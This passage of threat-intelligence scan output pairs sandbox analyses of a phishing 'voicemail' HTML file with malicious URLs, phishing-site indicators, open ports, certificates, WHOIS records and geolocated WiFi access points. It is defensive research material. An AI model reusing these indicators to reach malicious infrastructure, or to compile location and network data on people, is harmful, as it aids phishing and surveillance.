[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_0]- [targetUID: 00000000-00004108]\n "Tabs_13325492462112767" has type "data"- [targetUID: N/A]\n "ba9eeff3-0e9b-418b-bd12-291953464a4e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "a3bc7a46-aa43-4dec-aba5-04629b4b4587.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- [targetUID: N/A]\n "Cookies" has type "SQLite 3.x database last written using SQLite version 
3039003"- [targetUID: N/A]\n "History-journal" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History-journal]- [targetUID: 00000000-00004108]\n "Favicons" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Favicons]- [targetUID: 00000000-00004108]\n "Cookies-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "Vpn Tokens" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Vpn Tokens]- [targetUID: 00000000-00004108]\n "f_0004c3" has type "gzip compressed data from Unix original size modulo 2^32 106255"- [targetUID: N/A]\n "73cdbe4b-9686-4d04-b7be-c9c3f4f3e672.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://rathook.cc/"\n Pattern match: "https://rathook.cc"\n Heuristic match: "rathook.cc"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE53r3l?ver=5412,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE53bta?ver=2bf3,update_period:86400},creativeId:128000000003595"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "assets.db/MANIFEST-0000012023/04/08-22:41:11.570"\n Pattern match: "assets.db/MANIFEST-000001"\n Pattern match: "assets.db/000003.log"\n 
Pattern match: "https://rathook.cc/rat.gif"\n Heuristic match: "athook.cc"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n "192.168.241.220"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- [targetUID: N/A]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus 
engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/91 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'64324ea527cf82106202bff7', u'target_url': None, u'in | 185.199.110.153 |
| 2023-05-12 02:50:13 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'Voicemail Message (Elodie Raven_ Fernando R ) From_(178-077-5401)_part_001.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.58.100:443"\n "185.199.110.153:443"\n "13.227.74.112:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5828:304:WilStaging_02"\n "Local\\SM0:5828:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5828:120:WilError_01"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8140:304:WilStaging_02"\n "Local\\SM0:8140:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6188:304:WilStaging_02"\n "Local\\SM0:6188:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "getbootstrap.com"\n "zeptojs.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5828_1708721866\\product_page.js]- [targetUID: 00000000-00005828]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5828_946205218\\adblock_snippet.js]- [targetUID: 00000000-00005828]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5828_1708721866\\auto_open_controller.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5828_1708721866\\shoppingfre.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5828_1708721866\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005828]\n Dropped file: "edge_confirmation_page_validator.js" - Location: 
[%TEMP%\\5828_1708721866\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005828]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00005828]\n "Part-DE" has type "data"- Location: [%TEMP%\\5828_946205218\\Part-DE]- [targetUID: 00000000-00005828]\n "6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\6373a9a3-7787-4e10-8766-4a701eb0bde9.tmp]- [targetUID: 00000000-00006188]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005828]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE]- [targetUID: 00000000-00005828]\n "75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\75eccbf3-b65d-4d67-bf83-de033f7007cc.tmp]- [targetUID: 00000000-00005828]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00005828]\n "7de06ccc-e1f1-446e-9777-eeec16b06646.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7de06ccc-e1f1-446e-9777-eeec16b06646.tmp]- [targetUID: 00000000-00005828]\n "e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e3268b96-87e6-41f7-9441-5c4416dab6c3.tmp]- [targetUID: 00000000-00005828]\n "d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\d2a4e9f5-a74b-406f-8c0f-67bbb0725fef.tmp]- [targetUID: 00000000-00005828]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005828]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00005828]\n "39d75e53-4923-4b9e-bc44-d169ef496172.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\39d75e53-4923-4b9e-bc44-d169ef496172.tmp]- [targetUID: 00000000-00005828]\n "72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\72e56d01-e7ac-415a-b604-164a33d2eb3d.tmp]- [targetUID: 00000000-00005828]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID: 00000000-00005828]\n "8590c4d3-1805-4c87-83be-f642e5ed3447.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\8590c4d3-1805-4c87-83be-f642e5ed3447.tmp]- [targetUID: 00000000-00005828]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\5828_1392880218\\_metadata\\verified_contents.json]- [targetUID: 00000000-00005828]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5828_1708721866\\shopping_iframe_driver.js]- [targetUID: 00000000-00005828]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\AutofillStrikeDatabase\\LOG]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential 
IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"\n Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': | 185.199.110.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SWKIDNEY1 (Net ID: 00:02:6F:ED:54:F6) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:16 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2052 | 188.114.96.1 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.118 | 34.148.97.127 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:8880 | 188.114.96.1 |
| 2023-05-12 03:09:27 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Aug 3 00:00:00 2022 GMT
Not After : Aug 2 23:59:59 2023 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee:
e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f:
17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77:
53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9:
9a:ab:1a:dd:7d
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90
X509v3 Subject Alternative Name:
DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Aug 3 19:12:00.178 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5:
28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27:
DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A:
25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F:
8A:70:C8:E6:BA:DA
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB:
B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C
Timestamp : Aug 3 19:12:00.017 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2:
F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94:
BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8:
22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA:
F5:C9:B6:E6:AF:CD:A6:FB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09:
4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A
Timestamp : Aug 3 19:12:00.038 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91:
2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA:
EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED:
F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E:
8C:3E:16:39:2B:64:D1:78
Signature Algorithm: ecdsa-with-SHA256
30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c:
73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f:
c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c:
ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de
| 188.114.97.1 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00why00.github.io]
https://www.openphish.com/feed.txt | 00why00.github.io |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.26): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:18 | HTTP Headers | No | Web Spider | 2 | 0 | 2 | 0 | None | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WDQHNHJAAXWWVJBZZ5B", "content-type": "text/html; charset=UTF-8", "age": "0"} | pics.battleb0t.xyz |
| 2023-05-12 02:54:41 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.196.30.220:443 | 104.196.30.220 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet2EE2 (Net ID: 00:01:36:5B:2E:E0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:80 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Burfas10 (Net ID: 00:15:6D:A0:BD:ED) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Brown's Living Room (Net ID: 00:19:9D:FF:D0:E3) | 32.8608, -79.9746 |
| 2023-05-12 02:44:09 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-12 05:22:09 | ayhu.xyz |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14806242599 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:55:05 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 188.114.97.1 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c575ea9e94610e1-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01001101ck.github.io |
| 2023-05-12 02:58:22 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
